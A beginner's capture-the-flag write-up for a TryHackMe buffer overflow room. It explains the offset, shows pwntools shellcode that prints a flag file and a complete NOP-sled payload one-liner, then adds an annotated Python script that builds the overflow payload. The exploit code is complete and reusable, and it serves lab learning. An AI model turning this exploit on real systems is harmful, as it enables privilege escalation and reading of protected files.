Intro & Kudos

After struggling a bit with the Buffer Overflow Room on TryHackMe, I've finally managed to complete it thanks to the invaluable help of l1ge's writeup for task 8.

Since solving the last task wasn't as straightforward as I first expected, I thought some of you might benefit from this quick writeup in case you've hit a dead end.

Finding the offset

This bit is easy if you follow l1ge's explanation. It should be trivial to determine that the payload comes to 169 bytes in total: the 154-byte char buffer, 9 bytes of saved registers and 6 bytes for the return address. Only the low 6 bytes of the 8-byte saved return address need to be written: the top two bytes of any x86-64 user-space address are zero, so the two bytes left untouched in the return-address slot already hold the value we want.

Picking a shell code

This is where it gets tricky. You can follow the same steps described by l1ge and quickly find that the uid of the user that owns the flag file (user3) is 1003, but for some reason setting the real uid won't work (at least it didn't for me, and I followed the exact same steps as before). Some kind of additional protection must be in place, although I couldn't figure out which one.

My workaround was to skip getting a shell altogether and instead use pwntools to craft shellcode that prints the contents of the flag file directly, like this:

┌──(root💀kali)-[~]
└─# pwn shellcraft -f d amd64.linux.cat secret.txt

The -f d flag prints the bytes as an escaped string, ready to paste into the Python one-liner. The resulting shellcode (52 bytes) is 12 bytes longer than l1ge's, so the NOP sled and the padding after it had to shrink accordingly, and the final payload looked like this:

$(python -c "print '\x90'*88+'\x68\x79\x75\x01\x01\x81\x34\x24\x01\x01\x01\x01\x48\xb8\x73\x65\x63\x72\x65\x74\x2e\x74\x50\x6a\x02\x58\x48\x89\xe7\x31\xf6\x99\x0f\x05\x41\xba\xff\xff\xff\x7f\x48\x89\xc6\x6a\x28\x58\x6a\x01\x5f\x99\x0f\x05' + 'A'*23 + 'ADDR_BEFORE_STRT_OF_CODE'")

From there on, all you have to do is follow the same steps to find where the payload lands on the stack, pick an address inside the NOP sled (any of the 88 \x90 bytes will do, since execution slides down into the shellcode), convert it to little-endian and substitute it for the ADDR_BEFORE_STRT_OF_CODE placeholder. Two things to bear in mind: the one-liner relies on Python 2's print statement writing raw bytes, so under Python 3 you would need sys.stdout.buffer.write instead; and the exact stack address shifts with the environment (gdb, for instance, adds environment variables such as LINES and COLUMNS when it runs the program), which is exactly where a wide NOP sled earns its keep. The address that worked for me was 0x7fffffffe258, i.e. in little-endian:

\x58\xe2\xff\xff\xff\x7f
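As an added example (my own code, not part of this post or of l1ge's writeup), here is a small Python 3 script that builds the same 169-byte layout from the 52-byte shellcode above, computes the NOP sled length instead of hard-coding 88, packs the return address little-endian, and adds the two checks worth running before firing: that the shellcode contains no NUL byte (the payload goes through $(...) and argv, so a 0x00 would truncate it) and that the chosen address actually falls inside the sled. The default address is the 0x7fffffffe258 from this post; the buffer start passed to lands_in_sled is whatever gdb shows you (the value used in the usage comment is made up for illustration), the binary name ./target in that comment is an assumption, and the instruction annotations beside the shellcode bytes are mine.

```python
import struct
import sys

# The 52-byte shellcode from the post (pwn shellcraft amd64.linux.cat secret.txt).
# Annotations are mine: it does open("secret.txt", O_RDONLY) and then
# sendfile(1, fd, NULL, 0x7fffffff) to copy the file to stdout, with no NUL bytes.
SHELLCODE = (
    b"\x68\x79\x75\x01\x01"                      # push 0x01017579
    b"\x81\x34\x24\x01\x01\x01\x01"              # xor dword [rsp], 0x01010101 -> "xt\0\0"
    b"\x48\xb8\x73\x65\x63\x72\x65\x74\x2e\x74"  # mov rax, "secret.t"
    b"\x50"                                      # push rax ("secret.txt\0" now on the stack)
    b"\x6a\x02\x58"                              # push 2; pop rax      (SYS_open)
    b"\x48\x89\xe7"                              # mov rdi, rsp         (path)
    b"\x31\xf6"                                  # xor esi, esi         (O_RDONLY)
    b"\x99"                                      # cdq -> rdx = 0       (mode)
    b"\x0f\x05"                                  # syscall
    b"\x41\xba\xff\xff\xff\x7f"                  # mov r10d, 0x7fffffff (count)
    b"\x48\x89\xc6"                              # mov rsi, rax         (in_fd = open() result)
    b"\x6a\x28\x58"                              # push 40; pop rax     (SYS_sendfile)
    b"\x6a\x01\x5f"                              # push 1; pop rdi      (out_fd = stdout)
    b"\x99"                                      # cdq -> rdx = 0       (offset = NULL)
    b"\x0f\x05"                                  # syscall
)

TOTAL_LEN = 169   # full payload length used in the post
PAD_AFTER = 23    # 'A' filler between the shellcode and the return address, as in the post
ADDR_LEN = 6      # only the low 6 bytes of the 8-byte saved return address are overwritten


def check_shellcode(sc):
    """Return len(sc), or fail if sc contains a NUL byte.

    The payload travels through $(...) and argv, so a 0x00 would cut it short."""
    nul_offsets = [i for i, b in enumerate(sc) if b == 0]
    if nul_offsets:
        raise ValueError("NUL byte(s) in shellcode at offsets {}".format(nul_offsets))
    return len(sc)


def pack_addr(addr):
    """Little-endian 6-byte form of a user-space address (0x7fffffffe258 -> 58 e2 ff ff ff 7f).

    The top two bytes of an x86-64 user-space address are zero, so leaving the upper
    two bytes of the saved return address untouched still yields the right value."""
    full = struct.pack("<Q", addr)
    if full[ADDR_LEN:] != b"\x00" * (8 - ADDR_LEN):
        raise ValueError("address 0x{:x} does not fit in {} bytes".format(addr, ADDR_LEN))
    return full[:ADDR_LEN]


def sled_len(sc=SHELLCODE, total_len=TOTAL_LEN, pad_after=PAD_AFTER):
    """Number of NOPs needed so that sled + shellcode + filler + address == total_len."""
    n = total_len - ADDR_LEN - pad_after - check_shellcode(sc)
    if n < 0:
        raise ValueError("shellcode is {} bytes too long for the payload".format(-n))
    return n


def build_payload(ret_addr, sc=SHELLCODE, total_len=TOTAL_LEN, pad_after=PAD_AFTER):
    """NOP sled + shellcode + 'A' filler + little-endian return address."""
    n = sled_len(sc, total_len, pad_after)
    return b"\x90" * n + sc + b"A" * pad_after + pack_addr(ret_addr)


def lands_in_sled(buf_start, ret_addr, sc=SHELLCODE, total_len=TOTAL_LEN, pad_after=PAD_AFTER):
    """True if ret_addr points inside the NOP sled that begins at buf_start.

    buf_start is where the payload lands on the stack (read it from gdb); any address
    in [buf_start, buf_start + sled_len) slides down into the shellcode."""
    return buf_start <= ret_addr < buf_start + sled_len(sc, total_len, pad_after)


if __name__ == "__main__":
    # Usage (binary name ./target is assumed):
    #   ./target "$(python3 build_payload.py 7fffffffe258)"
    # Writes raw bytes, so it also works on Python 3 where print would not emit bytes.
    addr = int(sys.argv[1], 16) if len(sys.argv) > 1 else 0x7FFFFFFFE258
    sys.stdout.buffer.write(build_payload(addr))
```

Before sending the payload, call lands_in_sled with the buffer address you read from gdb and the address you intend to use; an address that is 0x58 bytes past the buffer start, for example, is already past an 88-byte sled and would jump into the shellcode's middle instead of sliding into its start.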

Hope that helped! If there’s anything that could be improved here do let me know - I’m a complete beginner in this type of challenge, and would love to learn more!